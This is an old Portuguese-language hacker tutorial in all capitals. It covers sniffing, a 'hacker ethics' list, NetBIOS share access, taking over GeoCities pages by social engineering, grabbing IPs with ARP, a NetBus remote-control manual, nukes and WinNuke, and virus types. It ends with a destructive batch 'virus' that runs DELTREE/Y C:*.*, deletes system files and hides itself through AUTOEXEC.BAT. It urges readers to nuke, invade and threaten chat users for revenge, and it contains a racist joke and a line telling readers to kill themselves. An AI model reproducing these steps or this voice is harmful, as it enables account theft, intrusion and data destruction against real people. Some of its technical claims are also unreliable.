ENTÃO É SEGUINTE MANO! SE VOCÊ TEM NEURÔNIOS O SUFICIENTE EM SEU CÉREBRO PERCEBEU QUE O WIN 95 E NT SÃO AS VÍTIMAS DE QUASE TODOS OS ATAQUES LISTADOS AQUI. E NÃO PENSE QUE ESSES SÃO TODOS, POIS EXISTEM MUITOS OUTROS QUE ESTÃO SENDO CRIADOS NO MOMENTO. DoS É AGORA, COMO JÁ MENCIONEI ANTES, UM CAMPO A SER EXPLORADO PELOS HACKERS.

SNIFFER
O SEGUINTE DOCUMENTO VISA AUXILIAR ADMINISTRADORES A COMPREENDER PROBLEMAS RELACIONADOS COM SNIFFING E AS POSSÍVEIS SOLUÇÕES. A AÇÃO DOS SNIFFERS É ATUALMENTE UM DOS PRINCIPAIS PROBLEMAS DE SEGURANÇA.

O QUE É O SNIFFER E COMO ELE FUNCIONA?

COMPUTADORES EM REDE COMPARTILHAM CANAIS DE COMUNICAÇÃO. ISSO É OBVIAMENTE MUITO MAIS BARATO DO QUE PASSAR UM CABO EM CADA PAR DE COMPUTADORES PARA FAZER AS CONEXÕES. NESTES CANAIS COMPARTILHADOS, COMPUTADORES PODEM RECEBER INFORMAÇÕES ENVIADAS A OUTROS COMPUTADORES. A AÇÃO DE CAPTURAR INFORMAÇÕES DESTINADAS A OUTROS COMPUTADORES É CHAMADA SNIFFING.

O PADRÃO ETHERNET ENVIA UM PACOTE PARA TODAS AS MÁQUINAS EM UM MESMO SEGMENTO. O CABEÇALHO DO PACOTE CONTÉM O ENDEREÇO DA MÁQUINA DESTINO. SUPÕEM-SE QUE SOMENTE A MÁQUINA QUE TENHA O ENDEREÇO CONTIDO NO PACOTE RECEBA-O. DIZ-SE QUE UM COMPUTADOR ESTÁ EM MODO PROMÍSTUO QUANDO O MESMO CAPTURA TODOS OS PACOTES, INDEPENDENTEMENTE DE SEREM OU NÃO DESTINADOS A ELE.

EM UM AMBIENTE DE REDE NORMAL, OS NOMES E AS SENHAS DOS USUÁRIOS SÃO PASSADAS ATRAVÉS DA REDE EM CLARO, OU SEJA, TEXTO NÃO CRIPTOGRAFADO. NÃO É DIFÍCIL, PORTANTO, UM INTRUSO UTILIZANDO UMA MÁQUINA COM INTERFACE DE REDE EM MODO PROMÍSTUO, OBTER QUALQUER SENHA, INCLUSIVE A DO ROOT, UTILIZANDO UM SNIFFER.

DICAS DE ÉTICA HACKER
DESCOBRIU ALGO NOVO, OLHE.
NÃO APAGUE. PENSE NO QUE SERIA MELHOR: TER ACESSO A PROVEDOR OU DETONÁ-LO?
NÃO MODIFIQUE NADA, A MENOS QUE QUER QUE SAIBAM QUE ESTEVE LÁ.
NUNCA TENTE UM SU ROOT DIRETO. ISSO FICA LOGADO.
NÃO FIQUE USANDO TELNET OU PEGANDO E-MAIL USANDO ACESSO DOS OUTROS.
NUNCA SUBESTIME UM SYSOP.
ESCOLHA HORAS ENTRE 0:30 E 6:00.
UMA VEZ LÁ DENTRO TENTE DOMINAR O LUGAR, MAS COM CAUTELA.
NÃO COFIE EM NINGUÉM.
SE PEGAR A SENHA DO ROOT DE UM PROVEDOR DE ACESSO E NÃO SABE O QUE FAZER, MATE-SE!
NÃO TESTE VÍRUS NO PRÓPRIO HD.
É BOM PREPARAR MUITO BEM UM A ESTRATÉGIA ANTES DE ATACAR.
USE OS COMPUTADORES DE SUA UNIVERSIDADE (É MAIS SEGURO)
NÃO FIQUE DISTRIBUINDO INFORMAÇÕES SOBRE O QUE VOCÊ PEGOU.
NÃO TENHA PENA DE NINGUÉM.
VOCÊ USA MS-DOS, LINUX, WINDOWS OU UNIX? NÃO CONTE A NINGUÉM...
NÃO CRIE LAÇOS AFETIVOS COM A VÍTIMA.
APRENDA O MÁXIMO QUE PUDER COM QUEM SABE MAIS! NÃO SE META A BESTA DIRETO!

MAIS DICAS
CONHEÇA A FUNDO OS SOSTEMAS OPERACIONAIS COMO O WINDOWS, LINUX E UNIX, WINDOWS NT. COM ELES É QUE VOCÊ IRÁ ENTENDER COMO QUEBRAR A SEGURANÇA OU ENTÃO COMO FUNCIONA A SEGURANÇA, É MAIS DIFÍCIL, MAIS NÃO IMPOSSÍVEL.

APRENDA UMA LINGUAGEM DE PROGRAMAÇÃO COMO VISUAL BASIC OU C. VOCÊ ESCREVENDO PEQUENOS PROGRAMINHAS PODE DEIXAR UM PROGRAMA RODANDO EM PARALELO PARA DESCOBRIR SENHAS DE ACESSO.

APRENDA A USAR O COMANDO TELNET DO UNIX PARA SE LOGAR EM MÁQUINAS REMOTAMENTE E COPIAR AQUELE PROGRAMA OCULTO QUE FALTA PARA VOCÊ ENTRAR NOO SISTEMA OU ENTÃO CADASTRAR UM USUÁRIO FANTASMA PARA ENTRAR NO SITEMA.

APRENDA COMO FUNCIONAM AS REDES E QUAIS OS TIPOS DE REDES QUE EXISTEM. HOJE EM DIA, A MAIORIA DOS COMPUTADORES ESTÃO INTERLIGADOS E VOCÊ CONHECENDO A ARQUITETURA E PROTOCOLOS USADOS FACILITA BASTANTE O ACESSO.

APRENDA O PROTOCOLO TCP/IP, QUE É USADO HOJE EM DIA NA INTERNET. ISSO SE VOCÊ QUISER SER UM HACKER DA NET.

DIAL UP
DEVIDO A UMA ENORME QUANTIDADE DE BUGS E UMA CAPACIDADE DE PROTEÇÃO QUE PERMITE QUE QUALQUER PESSOA INVADA UM MICRO QUE UTILIZE A REDE DIAL UP, COM UMA CONEXÃO PPP, O WINDOWS É UM DOS MAIORES MOTIVOS DE PIADAS ENTRE OS PORTUGUESES, NEGROS E O RUBINHO BARRICHELO. MESMO QUE VOCÊ NÃO ESTEJA UTILIZANDO O COMPARTILHAMENTO DE ARQUIVOS, QUALQUER PESSOA PODE INVADIR SEU COMPUTADOR SE VOCÊ ESTIVER FAZENDO ESTE TIPO DE CONEXÃO.

PARA ESTA "RECEITA DE BOLO" FUNCIONAR, VOCÊ TEM QUE ESTAR USANDO A REDE DIAL UP E UMA CONEXÃO PPP. ANTES DE TUDO VERIFIQUE SE VOCÊ POSSUI OS DRIVERS CLIENTES DA MICROSOFT. CASO NÃO ESTEJA, INSTALE-OS ATRAVÉS DO PAINEL DE CONTROLE NO ÍCONE REDE. VERIFIQUE TAMBÉM, SE O COMPARTILHAMENTO DE ARQUIVOS E IMPRESSORAS ESTÁ INSTALADO.

CONFIGURAR ESTAS OPÇÕES É SIMPLES. VÁ AO PAINEL DE CONTROLE E ABRA REDE. VERIFIQUE AS PROPRIEDADES DO TCP/IP. ALPI VOCÊ ENCONTRARÁ A OPÇÃO PARA ATIVAR A RESOLUÇÃO WINS. NO CASO DE VOCÊ NÃO CONHECER NENHUM SERVIDOR WINS, 204.118.34.6 COMO PRIMÁRIO E 204.118.34.11 COMO SECUNDÁRIO. ESSES SERVIDORES SÃO SO USA E GRATUÍTOS. CASO QUEIRA OUTROS ENDEREÇOS, UTILIZE UM DOS MECANISMOS DE BUSCA DA INTERNET. PARA CONFIGURAR O LMHOSTS VOCÊ PRECISA CRIAR UM ARQUIVO TEXTO SIMPLES, COM O NOME DE LMHOSTS. NESSE ARQUIVO É ONDE FICARÃO OS ENDEREÇOS DE IP E OS NOMES DOS COMPTADORES ACESSADOS. PARA LOCALIZAR DETERMINADO COMPUTADOR VOCÊ DIGITA O SEU NÚMERO DE IP E A SEGUIR SEU NETBIOS, NA MESMA LINHA, ESPARADO POR UM ESPAÇO. SE VOCÊ EXECUTAR O PROGRAMA NBTSTAT –N, TERÁ A LISTA, COM O NOME E O IP DE SEU COMPUTADOR, SEMPRE SENDO O PRIMEIRO DA LISTA, SEGUIDO DAS OUTRAS MÁQUINAS DISPONÍVEIS,TUDO NUMA JANELA DO DOS. ATRAVÉS DO EXPLORER VOCÊ PODERÁ VER OS COMPUTADORES DISPONÍVEIS NA REDE DOS QUAIS VOCÊ AINDA PODERÁ UTILIZAR OS DISCOS MAPEANDO-OS, O QUE OS TORNARÁ UNIDADES DE SEU COMPUTADOR.

COMO HACKEAR UMA PÁGINA DA GEOCITES?
É A COISA MAIS FÁCIL DO MUNDO...

ENTREI NA PÁGINA DE VÁRIAS PESSOAS E PENSEI PORQUE ATÉ HOJE NÃO OUVI FALAR DE NINGUÉM QUE TENHA HACKEADO UMA PÁGINA DA GEOCITES. VAMOS DIRETO AO ASSUNTO:

ANOTE O MEMBER NAME DA PÁGINA DANDO UM SOUCE.
ANOTE O LUGAR QUE ESTA PÁGINA ESTÁ, POR EXEMPLO: http://www.geocites.com/AUGUSTA/2000. LOGICAMENTE VOCÊ SÓ VAI ANOTAR O DIRETÓRIO E O BLOCK.
AGORA VÁ ATÉ A PÁGINA PRINCIPAL DA GEOCITES E CLIQUE NO LINK CONTACT GEOCITES, DEPOIS CLIQUE EM SYSTEM PROBLEMS, E DEPOIS EM SYSTEM PROBLEMS REPORTING FORM. LÁ VOCÊ VAI COLOCAR AS INFORMAÇÕES NECESSÁRIAS, O DIRETÓRIO, ACIMA CITADO, O BLOCK (ACONSELHO FAZER FOWARD) E NO ESPAÇO ABAIXO VOCÊ VAI COLOCAR OPROBLEMA. DIGA QUE AINDA NÃO RECEBEU SUA SENHA, EM INGLÊS: "EXCUSE ME FOR THE UP SET, BUT I DIDN’T RECEIVE MY SIGNAL".
PORRA! COMO É RIDÍCULO NÉ? AGORA É SÓ ESPERAR 3 OU 4 DIAS NO MÁXIMO QUE VOCÊ RECEBE SUA SENHA!

ASTREANDO IP PELO MS-DOS
TODO MUNDO TEM O MS-DOS INSTALADO EM SEU COMPUTADOR, POR ISSO, QUASE NINGUÉM SABE QUE TEM UM POTENTE RASTREADOR E IP EM SUA MÁQUINA.

MAS ANTES DE TUDO, O QUE É UM ENDEREÇO IP?

ENDEREÇO IP É UM NÚMERO QUE VOCÊ RECEBE QUANDO SE CONECTA A UM SERVIDOR. UM EXEMPLODE SERVIDOR DE IP É 200.200.200.200. OS TRÊS PRIMEIROS NÚMEROS REPRESENTAM O DNS DE SEU SERVIDOR, E O ÚLTIMO NÚMERO QUE VARIA. NO BRASIL, TODOS OS IP’S COMEÇAM COM 200.

PARA RASTREAR, VOCÊ DEVE USAR UM PROGRAMA CHAMADO ARP, PRESENTE NO DOS. O COMANDO QUE DEVE SER DIGITADO É ARP -A. VOCÊ TERÁ UMA LISTA DE ENDEREÇOS DE IP. MAS COMO SABER QUAL É O DA PESSOA?? VOCÊ DEVE TER CERTEZA QUE A ÚLTIMA INFORMAÇÃO QUE CHEGOU NO SEU MODEM VEIO DA PESSOA QUE VOCÊ QUER SABER O IP. E DAÍ ENTRAR COM O COMANDO NO MS-DOS. O IP DA PESSOA SERÁ O PRIMEIRO.

TAMBÉM EXESTEM OUTROS PROGRAMAS COMO O NETSTAT. COM ELE VOCÊ PODE RASTREAR QUAL É O SERVODOR DA PESSOA E OUTROS. MAS ESSE PROGRAMA É COMPLICADO E VOCÊ QUER SABER COMO USÁ-LO DIGITE NETSTAT –H, E A TELA DE AJUDA APARECE. O QUE FAZER COM O ENDERÇO DE IP? VOC~E PODE NUKAR A PESSOA. O NUKE É IUM PROGRAMA QUE ENVIA UMA MENSAGEM DE ERRO PELA PORTA 139, FAZENDO A CONEXÃO DA VÍTIMA CAIR. VOCÊ TAMBÉM PODE INVADIR O COMPUTADOR DA VÍTIMA USANDO O BACK ORIFICE OU OUTRO PROGRAMA.

MANUAL DO NETBUS
HOST NAME/IP- COLOQUE O IP DA VÍTIMA.
PORT- COLOQUE 12345 CASO JÁ NÃO HAJA UMA SELECIONADA.
IN INTERVAL, FUNCTION DELAY, MEMO E ABOUT- DEIXE COMO ESTÁ.
ADD IP- CASO O IP SEJA FIXO, ADICIONE ELE EM UMA LISTA.
DEL IP- DELETE O IP ADICIONADO ANTERIORMENTE.
CONNECT- ESTE É O BÁSICO, APÓS TER COLOCADO O IP DA COBAIA, SE CONECTE.
SCAN- SCANEIA IP COM O PATCHE.
SERVER ADMIN- MUDA AS CONFIGURAÇÕES DO NET BUS DA COBAIA. POSSUI ATÉ A OPÇÃO REMOVE A SERVER, OU SEJA, REMOVE O PATCHE DO MICRO DELA.
OPEN CD ROOM- ABRE E FECHA O CD ROOM DA VÍTIMA CONFORME VOCÊ CLIQUE.
SHOW IMAGE- VOCÊ DIGITA A URL DE UMA FOTO E ELA IRÁ APARECER NO MICRO DA COBAIA.
SWAP MOUSE- FAZ COM QUE OS BOTÕES DO MOUSE SE TROQUEM.
START PROGRAM- EXECUTA UM PROGRAMA NO MICRO DA COBAIA.
MSG MANAGER- POSSIBILITA A VOCÊ MANDAR MENSAGENS DE ERRO, EDITADAS POR VOCÊ. VOCÊ PODE DEIXAR QUE ELA RESPONDA, OU NÃO...
SCREENDUMP- DARÁ UM PRINT SCREEEM, NA TELA DA COBAIA, SALVANDO A IMAGEM DA COBAIA NO SEU NETBUS.
GET INFO- DARÁ INFORMAÇÕES DA PESSOA, POR QUAL ARQUIVO ELA ESTÁ INFECTADA, ETC.
PORT REDIRECT- MUDA A PORTA PELA QUAL VOCÊ UTILIZA PARA CONECTAR, MUITO COMPLEXO, POIS EXEISTEM POUCAS, MELHOR DEIXAR COMO ESTÁ.
PLAY SOUND- TOCARÁ UM SOM, QUE ESTÁ PRESENTE NO MICRO DA COBAIA. COLOQUE A LINHA DE COMANDO.
EXIT WINDOWS- RESETAR A COBAIA, DESLIGAR DIRETO, VOCÊ ESCOLHE.
SEND TEXT- SERVE PARA FALAR COM OUTROS INVASORES, CASO HAJA ALGUM.
ACTIVE WNDS- VER AS JANELAS QUE ESTÃO ATIVAS NO PC DA VÍTIMA. VOCÊ PODE ATIVAR, FECHAR OU ABRIR QUALQUER JANELA.
APP REDIRECT- BESTEIRA
MOUSE POS- VOCÊ ESCOLHE UMA POSIÇÃO PARA O MOUSE DELA FICAR. A COBAIA VAI FICAR LOUCA...
LISTEN- ESTA É UMA DAS MELHORES!! VOCÊ PODE VER O QUE A PESSOA ESCREVE E ESCREVER PARA ELA (HE, HE!). APROVEITE QUANDO A VÍTIMA ESTIVER FALANDO EM CANAL ABERTO, PARA QUEIMAR O FILME DELA COM FRASES CABULOSAS.
SOUND SYSTEM- SERVE PARA CONTROLAR O SISTEMA DE SOM DA VÍTIMA. AUMENTE NO MÁXIMO E EXECUTE UMA FILE WAVE!

SERVER SETUP- MUDA AS CONFIGURAÇÕES DO NET BUS DA PESSOA.

CONTROL MOUSE- VOCÊ CONTROLA O MOUSE DA VÍTIMA.

GO TO URL- COLOQUE UMA HOME PAGE QUE VOCÊ PREFERIR, OU ODIAR, PARA A COBAIA IR.

KEY MANAGER- ESTA TAMBÉM É MUITO MASSA! VOCÊ PODE DESATIVAR TECLAS DO TECLADO DA PESSOA. É MELHOR DESATIVAR ALGUMAS TECLAS, PRINCIPALMENTE AS VOGAIS.

FILE MANAGER- ESSA MATA A PAU!!!VOCÊ TERÁ ACESSO AO HD DA PESSOA E SUAS PARTIÇÕES! TUDO, TUDO SEU!!!!!! PODENDO FAZER DOWNLOAD, UPLOAD, O QUE QUISER! MAS LEMBRE-SE: ENTRE, OLHE, BRINQUE, MAIS JAMAIS APAGUE!

O NUKE
HÁ MUITA CONFUSÃO NO AR A RESPEITO DO NUKE, PRINCIPALMENTE DEPOIS DO SURGIMENTO DO WINNUKE. SURGIRAM PROTEÇÕES E DETETORES, E MUITA GENTE SE ESPANTA SOBRE O MOTIVO DE ELAS FUNCIONAREM EM ALGUNS CASOS E EM OUTROS NÃO. INFELIZMENTE, ESSA CONFUSÃO TEM ORIGEM MUITO SIMPLES: WINNUKE NÃO É NUKE! VAMOS ANALIZAR CADA UMA DAS DUAS TECNOLOGIAS COM PROFUNDIDADE SUFICIENTE PARA DESFAZER ESTE EQUÍVOCO. INICIALMENTE, APRESENTAREMOS UM TEXTO DE AUTORIA R.

O QUE É NUKE?

NUKE ÉO NEME ATRBUIDO A PROGRAMAS QUE FINALIZAM PREMATURAMENTE COM UMA CONEXÃO TCP ATRAVÉS DO ENVIO DE ICMP COM MENSAGENS DE ERRO. TAIS PACOTES PODEM SER DIRECIONADAS PARA O SERVIDOR, OU PARA O CLIENTE.

TAIS PROGRAMAS TEM A FINALIDADE DE TERMINAR COM A CONEXÃO FAZENDO COM QUE O CLIENTE OU O SERVIDOR SEJAM ENGANADOS POR UMA MENSAGEM DE ERRO QUE NORMALMENTE INDICARIAM UM PROBLEMA DE CONEXÃO ENTRE OS DOIS. O EFEITO DE TAL PROGRAMA PARA A VÍTIMA É A DESCINEXÃO DO SEU SERVIDOR, GERALMENTE SEM EFEITOS COLATERAIS. NUN EXEMPLO PRÁTICO SERIA COMO SE VOCÊ FOSSE DESCONECTADO DO SERVIDOR DE IRC.

HISTÓRICO
ACREDIT QUE O PRIMEIRO PROGRAMA NUKE FOI O NUKE.C, PARA UNIX. SEU AUTOR SE CHAMAVA SATANIC MECHANIC. ESTE PROGRAMA ENVIAVA PACOTES ICMP COM MENSAGENS DE ERRO NA PORTA 23 DOSERVIDOR, FINALIZANDO ASSIM COM CONEXÕES TELNET. COM A CRIAÇÃO DE FIREWALLS, NUKES DIRECIONADOS AO SERVIDOR PASSARAM A NÃO SER MAIS EFICIENTES. PASSOU-SE ENTÃO A NUKAR O HOST DO CLIENTE, NO ENTANTO, O FATO DO CLIENTE NÃO POSSUIR UMA PORTA FIXA PARA FIXA PARA ESTABELECER CONEXÃO COM O SERVIDOR DIFICULTA A OPERAÇÃO. A SOLUÇÃO PARA ISSO FOI O DEESENVOLOVIMENTO DE PROGRAMAS QUE VARREM SEQUENCIALMENTE TODAS AS PORTAS DO CLIENTE AONDE PODE EXIXTIR UMA CONEXÃO (DE 1024 A 65535), BOMBARDEANDO ELAS COM MENSAGENS DE ERRO ATÉ QUE SE ENCONTRE A PORTA ONDE SE DEU A CONEXÃO COM O SERVIDOR.

O NÚMERO DE PROGRAMAS NUKING PARA UNIX SUPERA EM MUITO OS EQUIVALENTES PARA WINDOWS, ALÉM DE GERALMENTE SEREM MUITO MAIS EFICIENTES DEVIDO AS LIMITAÇÕES DO WINSOCK. ALGUNS PROGRAMAS DE NUKING DESENVOLVIDOS PARA O WINSOCK 2.2 JÁ ESTÃO SENDO LANÇADOS, ESTES SIM MUITO MAIS PODEROSOS DO QUE OS SEUS ANTECESSORES PARA A PLATAFORMA MICROSOFT. ENTRE ESSES POSSO CITAR O CLICK4 QUE REALMENTE É MUITO MAIS PODEROSO.

UM DOS PRIMEIROS PROGRAMAS NUKE PARA A PLATAFORMAWINDOWS, FOI O WNUKE. É UM APLICATIVO EM 16 BITS QUE UTILIZA OS RECURSOS DO TRUMPET WINSOCK PARA ENVIAR OS PACOTES. FORAM LANÇADAS DIVERSAS VERSÕES DESTE PROGRAMA, CADA UMA IMPLEMENTANDO MAIS RECURSOS COMO CONTROLE DO TIPO DE MENSAGEM ICMP ENVIADA E DELAY ENTRE O ENVIO DOS PACOTES, DE FORMA QUE O PROGRAMA PODERIA SER UTILIZADO POR PESSOAS QUE NÃO DISPÕE DE UMA CONEXÃO DE ALTA VELOCIDADE COM A INTERNET.

COMO EU UTILIZO O NUKE?
BASICAMENTE TODOS OS PROGRAMAS DE NUKE UTILIZAM O MESMO PRINCÍPIO:

DEFINIR O ALVO DOS PACOTES;
DEFINIR O HOST DO CLIENTE;
DEFINIR O HOST DO SERVIDOR;
DEFINIR AS PORTAS A SEREM NUKADAS NO CLIENTE;
DEFINIR AS PRTAS A SEREM NUKADAS NO SERVIDOR;
DEFINIR O INTERVALO ENTRE OS PACOTES ENVIADOS;
UMA VEZ DETERMINADOS ESSES PARÂMETROS O PROGRAMA INICIA O ENVIO DE PACOTES DE ERRO. QUANTO MAIS RÁPIDA FOR A SUA CONEXÃO COM A INTERNET, MAIS RÁPIDO SERÁ O ENVIO DOS PACOTES, E MAIS RÁPIDO A VÍTIMA SERÁ ATINGIDA. NO LUGAR DA PORTA DO SERVIDOR, O MAIS ÓBVIO É COMEÇAR A VARREDURA A PARTIR DA PORTA 6667, QUE É A PORTA DEFALT PARA A MAIORIA DOS SERVIDORES DE IRC.

O TIPO DE MENSAGEM DE ERRO ENVIADA PODE SER DETERMINADA PREFERENCIALMENTE PELO TIPO DE ALVO. SE O ALVO FOR UMA MÁQUINA UNIX, MENSAGENS DE HOST UNREACHABLE DEMONSTRAM MAIOR EFICIÊNCIA. NO CASO DE MÁQUINA WINDOWS, "PROTOCOL UNREACHEBLE" DEMONSTROU SE MAIS EFICIENTE.

OOB: O BUG DA PORTA 139

DIVERSOS PROGRAMAS UTILIZAM ESSE BUG PARA TRAVAR SISTEMAS WINDOWS, GERANDO DoS ATRAVÉS DO ENVIO DE UM PACOTE OOB (OUT FO BAND) MARCADO COMO URGENTE PARA AS PORTAS ESPECÍFICAS, COMO POR EXEMPLO A PORTA 139. SISTEMAS WINDOWS NT SEM O HOTFIX.

OOBFIX INSTALADO AINDA NÃO AFETADOS EM DUAS OUTRAS PORTAS. APESAR DE SEREM CHAMADOS DE NUKE, NA VERDADE ESSES PREGRAMAS TEM FUNCIONAMENTO TOTALMENTE DIFERENTE, ELES APENAS SE APROVEITAM DE UMA FALHA DO SISTEMA.

CONFORME DESCRITO EM SEÇÕES ANTERIORES, O FUNCIONAMENTO DE PROGRAMAS NULE É DIFERENTE. OS EFEITOS DE UM PROGRAMA DE OOB SÃO FACILMENTE PERCEPTÍVEIS. TODO O SISTEMA DE REDE DO WINDOWS ENTRA EM PÂNICO E GERALMENTE É NECESSÁRIA A REINICIALIZAÇÃO DO SISTEMA PARA QUE A SITUAÇÃO SEJA NORMALIZADA. FELIZMENTE JÁ EXISTEM DIVERSOS PATCHES DISPONÍVEIS PARA RESOLVER ESTE PROBLEMA.

PINGA BOOM

INICIALMENTE VALE EXPLICAR QUE NÃO ESTAMOS FALANDE DE CTCP PING, E SIM DO PROGRAMA PING QUE VERIFICA SE UM ENDEREÇO DE IP EXISTE E ESTÁ ACESSÍVEL. O MAU USO INTENCIONADO DESTE PROGRAMA, A PARTIR DE UMA CONEXÃO RÁPIDA COM A REDE FAZ COM QUE A VÍTIMA CAIA NUM LAG QUE PROVAVELMENTE O LEVARÁ A DESCONEXÃO POR PING TIMEOUT, DEVIDO A QUANTIDADE DE PACOTES RECEBIDOS SUPERAR EM MUITO A CAPACIDADE DE ESSES MESMOS SEREM DESENVOLVIDOS.

WINNUKE

UM BUG DO SUBSISTEMA DE REDE DO UNIX 3.X,M 95 E NT PERMITE QUE USUÁRIOS EXTERNOS POSSAM DESATIVAR TOTALMENTE O SEU ACESSO À REDE, SIMPLESMENTE ENVIANDO INFORMAÇÕES MARCADAS COMO URGENTES A DETERMINADAS PORTAS DO SEU COMPUTADOR (SENDO QUE A MAIS USUAL É A 139). ESSE ATAQUE DE DoS DESABILTA TOTAÇMENTE A COMUNICAÇÃO TCP/IP DA SUA MÁQUINA RETORNANDO AO NORMAL APENAS APÓS O REBOOT DA SUA MÁQUINA. EXISTEM PROTEÇÕES DISPONÍVEIS QUE SIMPLESMENTE FECHAM A PORTA 139. ISSO NÃO É EFICENTE, POIS O ATAQUE OOB PODE SER EXECUTADO EM OUTRAS PORTAS MENOS USUAIS TAMBÉM. DA MESMA FORMA, OS DETETORES DE QUE SE DESTINAM A IDENTIFICAR A ORIGEM DOS ATAQUES DE OOB TAMBÉM NÃO TEM EFICIÊNCIA MÁXIMA PORQUE LIMITAM-SE A OUVIR A PORTA 139. ALÉM DISSO, ELES NÃO DEVERIAM CHAMAR-SE DETECTORES DE NUKE, UMA VEZ QUE O ATAQUE QUE ELES DETECTAM NÃO CONSTITUI UM NUKE CANÔNICO, MAS APENAS UM EXPLOIT DE UM BUG DO MICROSOFT WINSOCK.

PEGANDO O IP DE ALGUÉM EM UMA SALA DE CHAT

JÁ DEVE TER ACONTECIDO COM VOCÊ DE ESTAR EM UM CHAT DE WWW E ALGUÉM TE XINGAR. XINGAR NÃO RESOLVE, APENAS MANTÉM A BRIGA. MAS QUE TAL SE VINGAR COM UM POUCO MAIS DE CLASSE? SERIA UMA BOA HEIN? QUE TAL NUKAR O OTÁRIO OU ENTRAR EM NO SERVER DE IP DELE, PEGAR UM A SENHA E AMEAÇÁ-LO? ISSO SIM QUE É ESTILO! COM UM RASTREADOR DE IP E ALGUNS PROGRAMINHAS VOCÊ PODERÁ FODER LEGAL.

PEGAR O IP DE ALGUÉM EM UMA SALA QUE NÃO ACEITE TAGS HTML É MAIS FÁCIL DO QUE PEGAR IP EM SALA QUE ACEITE TAGS DE HTML. O TRUQUE É SIMPLES: VÁ AO PROMPT DO MS DOS E DIGITE ARP –A. COM ISSO IRÁ APARECER UM MONTE DE IP’S. O PRIMEIRO IP É O SEU EO ÚLTIMO DA PESSOA QUE TE MANDOU A ÚLTIMA MENSAGEM. VAMOS SUPOR QUE O RICK TE MANDOU UMA MENSAGEM. DAÍ VOCÊ RESOLVE PEGAR O IP DELE, E VAI AO E DIGITA ARP –A. O ÚLTIMO IP DA LISTA É O IP DO RICK. PRONTO, AGORA VOCÊ JÁ TEM O IP PROMPT DO MSDOS DO CARA. É SÓ PEGAR UM PROGRAMA NUKE E DERRUBAR O OTÁRIO.

OS VÍRUS
OS VÍRUS PODEM SER CCATALOGADOS EM TRÊS CATEGORIAS BÁSICAS:

VÍRUS DE BOOT: OS VÍRUS DE BOOT SÃO TRANSMITIDOS BASICAMENTE POR DISQUETES, COPIANDO-SE PARA O SERTOR BOOT (O GRUPO DE INSTRUÇÕES QUE O COMPUTADOR LÊ QUANDO É LIGADO). JÁ TIVERAM O SEU ALGE DA FAMA, MAS HOJE ESTÃO CADA VEZ MAIS RAROS.

VÍRUS EXECUTÁVEIS: TAMBÉM CONHECIDOS COMO VÍRUS DE ARQUIVOS ESTES PROGRAMAS SE ANEXAM AO CÓDIGO EXECUTÁVEL DE OUTROS PROGRAMAS, PRINCIPALMENTE OS QUE TEM A TERMINAÇÃO .EXE OU .COM. QUANDO UM PROGRAMA INFECTADO É EXECUTADO, O VÍRUS VAI PARA A MEMÓRIA DO COMPUTADOR E LÁ INFECTA OUTROS PROGRAMAS, EXECUTADOS POSTERIORMENTE.

VÍRUS DE MACRO: ESTES VÍRUS ATACAM ARQUIVOS DE GABARITOS (TEMPLATES) DO MICROSOFT OFFICE, PRINCIPALMENTE OS ARQUIVOS NORMAL .DOT. A PARTIR DESTA CONTAMINAÇÃO. TODO O DOCUMENTO CRIADO POSSUIRÁ VÍRUS DENTRO DELE, E ESTE É UMA RAZÃO PELA QUAL ESSA CATEGORIA DE VÍRUS PE A MAIS DIFUNDIDA ATUALMENTE. A OUTRA É A RAZÃO DE SER MUITO FÁCIL PROGRAMAR EM VBA DO QUE LINGUAGEM COMO ASSEMBLER OU C++ UTILIZADA PELOS PROGRAMADORES DE VÍRUS EXECUTÁVEIS.

UMA BOA ESTRATÉGIA DE SEGURANÇA É MANTER A OPÇÃO DE PROTEÇÃO CONTRA VÍRUS HABILITADA NO WORD. ESTA OPÇÃO ESTÁ ABILITADA NO MENU FERRAMENTAS/OPÇÕES/GERAL/ATIVAR PROTEÇÃO CONRA VÍRUS DE MACRO. ASSIM, SEMPRE QUE ALGUM ARQUIVO COM MACROS FOR ABERTO, EXISTIRÁ UMA OPÇÃO DE DESABILIITAR O SEU CARREGAMENTO.

FAZER VÍRUS
AGORA VOCÊ APRENDERÁ COMO FAZER ALGUNS TIPOS DE VÍRUS "SIMPLES". VÍRUS MAIS COMPLEXOS, EXIGEM CONHECIMENTOS DE PROGRAMAÇÃO. EM PRIMEIRO LUGAR VOCÊ DEVE LOCALIZAR O ARQUIVO EDIT.COM NA PASTA C:WINDOWSCOMMAND. COM O ARQUIVO ENCONTRADO, COPIE –O PARA UM DISQUETE E ABRA-O. IRÁ APARECER UMA TELA AZUL. É UM EDITOR COM POUCOS RECURSOS. ENTÃO DIGITE:

@ECHO OFF

BREAK OFF

DEPOIS DISSO, VOCÊ ESCOLHE O TIPO DE VÍRUS QUE QUER FAZER.

VAMOS SUPOR QUE O VÍRUS IRÁ APAGAR TODOS OS ARQUIVOS DO PC ALHEIO. VOCÊ DEVE USAR OS SEGUINTES COMANDOS:

DELTREE/Y C:*.*

CASO QUEIRA QUE APAGUE OS ARQUIVOS DE SISTEMA, USE OS SEGUINTES COMANDOS:

DEL C:AUTOEXEC.BAT

DEL C:COMMAND.COM

DEL C:CONFIG.SYS

É UMA QUESTÃO DE LÓGICA. USE A LÓGICA PARA CRIAR OS SEUS VÍRUS E PARA QUE ELES FAÇAM O QUE VOCÊ QUEIRA. DEPOIS USE O COMANDO COPY (NOME DO VÍRUS).BAT AUTOEXEC.BAT, ELA ENTÃO TERÁ A CERTEZA DE ESTAR EXECUTANDO O SEU VÍRUS AO INICIAR O COMPUTADOR ALVO.

DEPOIS DE TUDO, SALVE O VPIRUS COM A EXTENSÃO .BAT, DE FORMA QUE FIQUE: OQUEQUISER.BAT. AGORA O SEU VÍRUS ESTÁ PRONTO, BASTA SER EXECUTADO E O VÍRUS IRÁ TOMAR AS PROVIDÊNCIAS NECESSÁRIAS.

IMPORTANTE: CASO FOR PASSAR ESSE VÍRUS VIA DISQUETE, VOCÊ NÃO DEVE ESQUECER DE FINALIZAR O ARQUIVO COM O COMANDO DELTREE/Y A:*.*. ISSO SERVE PARA NÃO DEIXAR VESTÍGIO DO SEU ATO INSANO.

TELNET
